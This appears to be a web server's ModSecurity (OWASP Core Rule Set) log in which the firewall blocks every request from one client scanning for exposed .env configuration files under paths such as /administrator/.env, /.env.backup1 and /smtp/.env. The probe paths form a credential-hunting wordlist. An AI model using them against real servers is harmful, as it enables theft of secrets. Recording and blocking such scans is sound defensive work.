[Mon May 11 18:07:26.036371 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-vg-Qm4vhlWBPlMjeNQAAAAo"]
[Mon May 11 18:07:26.498743 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/en/.env"] [unique_id "agH-vg-Qm4vhlWBPlMjeNwAAAAo"]
[Mon May 11 18:07:26.498995 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/en/.env"] [unique_id "agH-vg-Qm4vhlWBPlMjeNwAAAAo"]
[Mon May 11 18:07:26.499310 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-vg-Qm4vhlWBPlMjeNwAAAAo"]
[Mon May 11 18:07:26.792708 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/administrator/.env"] [unique_id "agH-vg-Qm4vhlWBPlMjeOAAAAAo"]
[Mon May 11 18:07:26.792987 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/administrator/.env"] [unique_id "agH-vg-Qm4vhlWBPlMjeOAAAAAo"]
[Mon May 11 18:07:26.793308 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-vg-Qm4vhlWBPlMjeOAAAAAo"]
[Mon May 11 18:07:27.119933 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/psnlink/.env"] [unique_id "agH-vw-Qm4vhlWBPlMjeOQAAAAo"]
[Mon May 11 18:07:27.120192 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/psnlink/.env"] [unique_id "agH-vw-Qm4vhlWBPlMjeOQAAAAo"]
[Mon May 11 18:07:27.120486 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-vw-Qm4vhlWBPlMjeOQAAAAo"]
[Mon May 11 18:07:27.425895 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/exapi/.env"] [unique_id "agH-vw-Qm4vhlWBPlMjeOgAAAAo"]
[Mon May 11 18:07:27.426186 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/exapi/.env"] [unique_id "agH-vw-Qm4vhlWBPlMjeOgAAAAo"]
[Mon May 11 18:07:27.426510 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-vw-Qm4vhlWBPlMjeOgAAAAo"]
[Mon May 11 18:07:27.872412 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/sitemaps/.env"] [unique_id "agH-vw-Qm4vhlWBPlMjePAAAAAo"]
[Mon May 11 18:07:27.872687 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/sitemaps/.env"] [unique_id "agH-vw-Qm4vhlWBPlMjePAAAAAo"]
[Mon May 11 18:07:27.872968 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-vw-Qm4vhlWBPlMjePAAAAAo"]
[Mon May 11 18:07:28.470192 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.backup1"] [unique_id "agH-wA-Qm4vhlWBPlMjePQAAAAo"]
[Mon May 11 18:07:28.470444 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.backup1"] [unique_id "agH-wA-Qm4vhlWBPlMjePQAAAAo"]
[Mon May 11 18:07:28.470731 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-wA-Qm4vhlWBPlMjePQAAAAo"]
[Mon May 11 18:07:28.808994 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.backup2"] [unique_id "agH-wA-Qm4vhlWBPlMjePgAAAAo"]
[Mon May 11 18:07:28.809275 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.backup2"] [unique_id "agH-wA-Qm4vhlWBPlMjePgAAAAo"]
[Mon May 11 18:07:28.810915 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-wA-Qm4vhlWBPlMjePgAAAAo"]
[Mon May 11 18:07:29.094378 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /logs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/logs/.env"] [unique_id "agH-wQ-Qm4vhlWBPlMjeQAAAAAo"]
[Mon May 11 18:07:29.094674 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/logs/.env"] [unique_id "agH-wQ-Qm4vhlWBPlMjeQAAAAAo"]
[Mon May 11 18:07:29.095051 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-wQ-Qm4vhlWBPlMjeQAAAAAo"]
[Mon May 11 18:07:29.685760 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cache/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cache/.env"] [unique_id "agH-wQ-Qm4vhlWBPlMjeQQAAAAo"]
[Mon May 11 18:07:29.685951 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cache/.env"] [unique_id "agH-wQ-Qm4vhlWBPlMjeQQAAAAo"]
[Mon May 11 18:07:29.686256 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-wQ-Qm4vhlWBPlMjeQQAAAAo"]
[Mon May 11 18:07:30.105291 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mailer/.env"] [unique_id "agH-wg-Qm4vhlWBPlMjeQwAAAAo"]
[Mon May 11 18:07:30.105522 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mailer/.env"] [unique_id "agH-wg-Qm4vhlWBPlMjeQwAAAAo"]
[Mon May 11 18:07:30.105832 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-wg-Qm4vhlWBPlMjeQwAAAAo"]
[Mon May 11 18:07:30.407094 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mail/.env"] [unique_id "agH-wg-Qm4vhlWBPlMjeRAAAAAo"]
[Mon May 11 18:07:30.407309 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mail/.env"] [unique_id "agH-wg-Qm4vhlWBPlMjeRAAAAAo"]
[Mon May 11 18:07:30.407589 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-wg-Qm4vhlWBPlMjeRAAAAAo"]
[Mon May 11 18:07:30.990240 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /email/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/email/.env"] [unique_id "agH-wg-Qm4vhlWBPlMjeRQAAAAo"]
[Mon May 11 18:07:30.990472 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/email/.env"] [unique_id "agH-wg-Qm4vhlWBPlMjeRQAAAAo"]
[Mon May 11 18:07:30.990763 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-wg-Qm4vhlWBPlMjeRQAAAAo"]
[Mon May 11 18:07:31.513567 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /smtp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/smtp/.env"] [unique_id "agH-ww-Qm4vhlWBPlMjeRwAAAAo"]
[Mon May 11 18:07:31.513776 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/smtp/.env"] [unique_id "agH-ww-Qm4vhlWBPlMjeRwAAAAo"]
[Mon May 11 18:07:31.514107 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-ww-Qm4vhlWBPlMjeRwAAAAo"]
